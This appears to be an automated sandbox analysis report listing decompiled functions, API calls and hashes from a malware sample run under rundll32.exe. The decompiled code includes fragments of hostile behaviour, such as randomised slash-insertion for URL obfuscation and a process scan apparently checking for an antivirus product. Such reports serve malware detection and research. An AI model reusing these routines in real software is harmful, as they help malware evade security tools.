Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 86b0b788766c0368f8eef9de73a4f2ac8ff0f254d2945738359a0fb1e74f453d
Instruction ID: e5535dabeaaf21dcd30210f1b4d8f19a3dcacbefa26235accc3295bc3af174a1
Opcode Fuzzy Hash: 86b0b788766c0368f8eef9de73a4f2ac8ff0f254d2945738359a0fb1e74f453d
Instruction Fuzzy Hash: 3321417990020AEFDB15EFA8C9849DEBBB5FF49244B10C169E902D7214EB70DA41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 011817E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E011817E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x118d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x118d250; // 0xd89d943d
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x118d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x011817ed
0x011817f0
0x011817f6
0x0118180e
0x01181810
0x01181815
0x01181817
0x0118181a
0x0118181c
0x0118181f
0x01181821
0x01181821
0x01181823
0x0118182e
0x01181833
0x01181844
0x0118184c
0x01181851
0x01181854
0x01181857
0x01181859
0x0118185c
0x0118185f
0x0118185f
0x01181862
0x0118186d
0x01181872
0x0118187c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01181C49,00000000,?,?,011820C2,?,05A395B0), ref: 011817F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 01181808
memcpy.NTDLL(00000000,?,-00000008,?,?,?,01181C49,00000000,?,?,011820C2,?,05A395B0), ref: 0118184C
memcpy.NTDLL(00000001,?,00000001), ref: 0118186D

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 284405f06e8ad9b184af46cde7811c98a00547e5d4b558aa61a936b4a7784123
Instruction ID: 5f08819da96f5ca204638e7783b31547dc5b0264fc464db254dead31123422de
Opcode Fuzzy Hash: 284405f06e8ad9b184af46cde7811c98a00547e5d4b558aa61a936b4a7784123
Instruction Fuzzy Hash: 98110672A00214BFD7289BA9DC84E9EBBFADB912B0B058176F50597190EB709E41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E1584, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6E1E15AA

Part of subcall function 6E1E13CF: __fltout2.LIBCMT ref: 6E1E13FB

__cftog_l.LIBCMT ref: 6E1E15D0
__cftoe_l.LIBCMT ref: 6E1E1602

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 466b781825e0290c6ebb5ca47bbab6666077f9babd7137ed273a915d63ef55cd
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: FE11697210054ABBCF124FC5CC11CEE3F66BF1A354F598814FA6958920D732C9B6BB81

Uniqueness

Uniqueness Score: -1.00%

Function 0118A65C, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0118A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x118d2a8; // 0x48aa5a8
						_t2 = _t9 + 0x118ee34; // 0x73617661
						_push( &_v264);
						if( *0x118d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x0118a667
0x0118a671
0x0118a675
0x0118a67f
0x0118a6b0
0x0118a686
0x0118a68b
0x0118a698
0x0118a6a1
0x0118a6b8
0x0118a6a3
0x0118a6ab
0x00000000
0x0118a6ab
0x0118a6b9
0x0118a6ba
0x00000000
0x0118a6ba
0x00000000
0x0118a6b4
0x0118a6c0
0x0118a6c5

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0118A66C
Process32First.KERNEL32(00000000,?), ref: 0118A67F
Process32Next.KERNEL32(00000000,?), ref: 0118A6AB
CloseHandle.KERNEL32(00000000), ref: 0118A6BA

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 90bb36fe6d47946461a13e9aab02696baf1d9153661f3e334c8ea20d04120382
Instruction ID: 5035b1ca0a0ab4c4f45cd88e3961e0b502384e6a04aecaaf242d6bc7f8729e68
Opcode Fuzzy Hash: 90bb36fe6d47946461a13e9aab02696baf1d9153661f3e334c8ea20d04120382
Instruction Fuzzy Hash: 82F02B361011256BD729BAA6AC48EDF776CEFC5318F118162E515D3044EB20C9878FB2

Uniqueness

Uniqueness Score: -1.00%

Function 01186840, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01186840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x0118684a
0x0118684e
0x01186863
0x01186865
0x0118686a
0x01186870
0x01186872
0x01186877
0x01186882
0x01186879
0x01186879
0x01186879
0x01186877
0x01186890

APIs

memset.NTDLL ref: 0118684E
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 01186863
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 01186870
CloseHandle.KERNEL32(?), ref: 01186882

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 1a8ba19f4dded8a82abff67fe452ba539f02edbe9d34d29f8fae3b4b09802cca
Instruction ID: d2673eae1ab5d5e441bc0f1b3c5481cc119c7609ef451dd1927f3cacb88b9522
Opcode Fuzzy Hash: 1a8ba19f4dded8a82abff67fe452ba539f02edbe9d34d29f8fae3b4b09802cca
Instruction Fuzzy Hash: 00F054F110430C7FD3286F26DCC4C2BBBACEB52199B118A3DF14681511D671A8458F70

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6788, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E1D67A2

Part of subcall function 6E1D5012: __FF_MSGBANNER.LIBCMT ref: 6E1D5035
Part of subcall function 6E1D5012: __NMSG_WRITE.LIBCMT ref: 6E1D503C

std::bad_alloc::bad_alloc.LIBCMT ref: 6E1D67C5

Part of subcall function 6E1D676D: std::exception::exception.LIBCMT ref: 6E1D6779

std::bad_exception::bad_exception.LIBCMTD ref: 6E1D67D9
__CxxThrowException@8.LIBCMT ref: 6E1D67E7

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1802512180-0
Opcode ID: f52788884c56545f419f4f68759d572c4302e8625c0c434577ccb9860d0caa24
Instruction ID: 2e31939c2eff613c59e4ab0f7ba1b1fc1dcadfc203dec4cc9e2f3ff593e6b879
Opcode Fuzzy Hash: f52788884c56545f419f4f68759d572c4302e8625c0c434577ccb9860d0caa24
Instruction Fuzzy Hash: 66F0823142450D6BDB44EBE5DD14DCD36AD9B09238F204819D812AA080DF25A9DDF591

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D53B1, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1D53BD

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D53D4
__amsg_exit.LIBCMT ref: 6E1D53E2
__lock.LIBCMT ref: 6E1D53F2

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 2ccc3ec4292b646d115d29317f397857f4835b6f93450465903ee9f0d7e422ad
Instruction ID: 3ca96fe2bcc0742920d2489d79225be4d665731175bf95217e4f9f1d0d4014be
Opcode Fuzzy Hash: 2ccc3ec4292b646d115d29317f397857f4835b6f93450465903ee9f0d7e422ad
Instruction Fuzzy Hash: 83F03032950B04EBD761EBF8840478E72A9EF0172AF604E1AD4519B2D0DBF499C8FB52

Uniqueness

Uniqueness Score: -1.00%

Function 01181B42, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01181B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x118d26c; // 0x2d8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x118d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x118d26c; // 0x2d8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x118d238; // 0x5640000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x01181b42
0x01181b49
0x01181b93
0x01181b95
0x01181b95
0x01181b4d
0x01181b53
0x01181b58
0x01181b5c
0x01181b62
0x01181b69
0x00000000
0x00000000
0x01181b6b
0x01181b70
0x00000000
0x00000000
0x00000000
0x01181b70
0x01181b72
0x01181b7a
0x01181b7d
0x01181b7d
0x01181b83
0x01181b8a
0x01181b8d
0x01181b8d
0x00000000

APIs

SetEvent.KERNEL32(000002D8,00000001,01184F0E), ref: 01181B4D
SleepEx.KERNEL32(00000064,00000001), ref: 01181B5C
CloseHandle.KERNEL32(000002D8), ref: 01181B7D
HeapDestroy.KERNEL32(05640000), ref: 01181B8D

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 34d869f5c0291bb814891470d39745a0b3c412139f36fdecd910bbde8c6977ac
Instruction ID: 86386b1203e4022ed346bc9162f8e15d3cb8cb9f40ce9419ef3876e1748605ab
Opcode Fuzzy Hash: 34d869f5c0291bb814891470d39745a0b3c412139f36fdecd910bbde8c6977ac
Instruction Fuzzy Hash: D6F019766013119BEB387B79F848F5A3BA957056B1704C530B924D75D8EB30C4C29B60

Uniqueness

Uniqueness Score: -1.00%

Function 011823F4, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E011823F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x118d32c; // 0x5a395b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x118d32c; // 0x5a395b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x118d030) {
					HeapFree( *0x118d238, 0, _t8);
				}
				_t14[1] = E0118486F(_v0, _t14);
				_t11 =  *0x118d32c; // 0x5a395b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x011823f4
0x011823f4
0x011823fd
0x0118240d
0x0118240d
0x01182412
0x01182417
0x00000000
0x00000000
0x01182407
0x01182407
0x01182419
0x0118241d
0x0118242f
0x0118242f
0x0118243f
0x01182442
0x01182447
0x0118244b
0x01182451

APIs

RtlEnterCriticalSection.NTDLL(05A39570), ref: 011823FD
Sleep.KERNEL32(0000000A,?,01185D25), ref: 01182407
HeapFree.KERNEL32(00000000,00000000,?,01185D25), ref: 0118242F
RtlLeaveCriticalSection.NTDLL(05A39570), ref: 0118244B

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 39fe93f5db24221eeffcac5e38f1bb21c2ddd9ee3672b08eb04511861e9fb6af
Instruction ID: 1364726c4c10a254b125f261d91edcedb7b455d5073e3a40c5242e66a8d4606d
Opcode Fuzzy Hash: 39fe93f5db24221eeffcac5e38f1bb21c2ddd9ee3672b08eb04511861e9fb6af
Instruction Fuzzy Hash: 53F0DA746042419BEB2DAFACE948F5A77F4AB19781B04C424F961DA295C730D882CF75

Uniqueness

Uniqueness Score: -1.00%

Function 01186702, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E01186702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x118d32c; // 0x5a395b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x118d32c; // 0x5a395b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x118d32c; // 0x5a395b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x118e81a) {
					HeapFree( *0x118d238, 0, _t10);
					_t7 =  *0x118d32c; // 0x5a395b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x01186702
0x0118670b
0x0118671b
0x0118671b
0x01186720
0x01186725
0x00000000
0x00000000
0x01186715
0x01186715
0x01186727
0x0118672c
0x01186730
0x01186743
0x01186749
0x01186749
0x01186752
0x01186754
0x01186758
0x0118675e

APIs

RtlEnterCriticalSection.NTDLL(05A39570), ref: 0118670B
Sleep.KERNEL32(0000000A,?,01185D25), ref: 01186715
HeapFree.KERNEL32(00000000,?,?,01185D25), ref: 01186743
RtlLeaveCriticalSection.NTDLL(05A39570), ref: 01186758

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 7aa9fa1a0d0905be2f398d77e2869c40b6040fff19fb59c49b205dae74c2be6d
Instruction ID: fa6a29f823ec38a8cd5a48320f6510ffd231094a2ef11c6b6972ff4a8374be26
Opcode Fuzzy Hash: 7aa9fa1a0d0905be2f398d77e2869c40b6040fff19fb59c49b205dae74c2be6d
Instruction Fuzzy Hash: E0F0DAB8604600DBEB2CABA4E999F1D77E6AB09751B04C025E912DB3A4D730E881CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D83B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1D83C5

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D83D3

Strings

csm, xrefs: 6E1D83E1

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b379784f21376378956890797898c50fa94f265a2b5d3dfdd8b7aa5412bfc9b9
Instruction ID: aa507e5cda70014c3e7474cb227d449d61db69846202610f7c8ca017137f1eda
Opcode Fuzzy Hash: b379784f21376378956890797898c50fa94f265a2b5d3dfdd8b7aa5412bfc9b9
Instruction Fuzzy Hash: B4016935804605CFCB66DFE0D490B9DB3B9BF24311F21A82ED45196690DF3195CEEB41

Uniqueness

Uniqueness Score: -1.00%

Function 01185AF1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01185AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E0118A71F(_t2);
				if(_t34 != 0) {
					_t30 = E0118A71F(_t28);
					if(_t30 == 0) {
						E0118A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0118A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0118A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x01185af1
0x01185afb
0x01185afd
0x01185b03
0x01185b03
0x01185b0c
0x01185b10
0x01185b1c
0x01185b20
0x01185b94
0x01185b22
0x01185b22
0x01185b26
0x01185b2b
0x01185b30
0x01185b4a
0x01185b39
0x01185b39
0x01185b3d
0x01185b40
0x01185b45
0x01185b45
0x01185b4f
0x01185b77
0x01185b7d
0x01185b80
0x01185b51
0x01185b53
0x01185b5b
0x01185b66
0x01185b6b
0x01185b6b
0x01185b87
0x01185b8e
0x01185b8f
0x01185b8f
0x01185b20
0x01185b9f

APIs

lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,01183E08,?,?,?,?,00000102,011867B8,?,?,00000000), ref: 01185AFD

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

Part of subcall function 0118A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,01185B2B,00000000,00000001,00000001,?,?,01183E08,?,?,?,?,00000102), ref: 0118A790
Part of subcall function 0118A782: StrChrA.SHLWAPI(?,0000003F,?,?,01183E08,?,?,?,?,00000102,011867B8,?,?,00000000,00000000), ref: 0118A79A

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01183E08,?,?,?,?,00000102,011867B8,?), ref: 01185B5B
lstrcpy.KERNEL32(00000000,00000000), ref: 01185B6B
lstrcpy.KERNEL32(00000000,00000000), ref: 01185B77

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 1e995e91fb547a287ddb92f96c600b0ec6446af3bdc25ee6daed970c2ba72396
Instruction ID: 061165e421e8388a1a55114b90f97e62725c131913862a0093bf028c5889778d
Opcode Fuzzy Hash: 1e995e91fb547a287ddb92f96c600b0ec6446af3bdc25ee6daed970c2ba72396
Instruction Fuzzy Hash: 3921C076504216ABCB5A7F78D884A9E7FBBEF26294B15C051F9059F201E731C9018FE0

Uniqueness

Uniqueness Score: -1.00%

Function 011845C6, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E011845C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E0118A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x011845db
0x011845df
0x011845e9
0x011845ee
0x011845f3
0x011845f5
0x011845fd
0x01184602
0x01184610
0x01184615
0x0118461f

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,05A3935C,?,01188D93,004F0053,05A3935C,?,?,?,?,?,?,0118523E), ref: 011845D6
lstrlenW.KERNEL32(01188D93,?,01188D93,004F0053,05A3935C,?,?,?,?,?,?,0118523E), ref: 011845DD

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,01188D93,004F0053,05A3935C,?,?,?,?,?,?,0118523E), ref: 011845FD
memcpy.NTDLL(74B069A0,01188D93,00000002,00000000,004F0053,74B069A0,?,?,01188D93,004F0053,05A3935C), ref: 01184610

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 6ba029e714761a5be5b4644e316c9aede3057d38c40b22a479ba6b871eed362f
Instruction ID: a1901ecdfda7f48b6d440eb19752e553b54fd1f6fe0a075033e95eb43ec4db3d
Opcode Fuzzy Hash: 6ba029e714761a5be5b4644e316c9aede3057d38c40b22a479ba6b871eed362f
Instruction Fuzzy Hash: AAF04936900119BBCF15EFA8CC84CCF7BADEF192987118062EA04D7201EB31EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0118361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05A39A78,00000000,00000000,7742C740,011820ED,00000000), ref: 0118362A
lstrlen.KERNEL32(?), ref: 01183632

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

lstrcpy.KERNEL32(00000000,05A39A78), ref: 01183646
lstrcat.KERNEL32(00000000,?), ref: 01183651

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: d2bf952d930dd76dbdefc6b3815f78e952214b8a83b1b419db7106bbea5c4ade
Instruction ID: 4fb5dcad3e6f5be2873e53510af21fb003d09f2a8018550f13fb12375e2e6c59
Opcode Fuzzy Hash: d2bf952d930dd76dbdefc6b3815f78e952214b8a83b1b419db7106bbea5c4ade
Instruction Fuzzy Hash: 6FE09237501621678725BBE8AC48C9FBBADEF8A6A17048427F710D3104C721D8029BF1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1632 Parent PID: 4796 rundll32.exeCOMMON

Executed Functions

Function 6E1DD186, Relevance: 66.4, APIs: 44, Instructions: 432COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 6E1DD1BD
___getlocaleinfo.LIBCMT ref: 6E1DD1D2
___getlocaleinfo.LIBCMT ref: 6E1DD1E7
___getlocaleinfo.LIBCMT ref: 6E1DD1FC
___getlocaleinfo.LIBCMT ref: 6E1DD214
___getlocaleinfo.LIBCMT ref: 6E1DD229
___getlocaleinfo.LIBCMT ref: 6E1DD23B
___getlocaleinfo.LIBCMT ref: 6E1DD250
___getlocaleinfo.LIBCMT ref: 6E1DD268
___getlocaleinfo.LIBCMT ref: 6E1DD27D

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: eabbdf657e399f07c2ee4d9dc041221e202d76291481bf30a1e5e3ccc471cc6b
Instruction ID: 517100233a267b388a3115fc3f534ab3b261f572310cf674ae543865285e25d9
Opcode Fuzzy Hash: eabbdf657e399f07c2ee4d9dc041221e202d76291481bf30a1e5e3ccc471cc6b
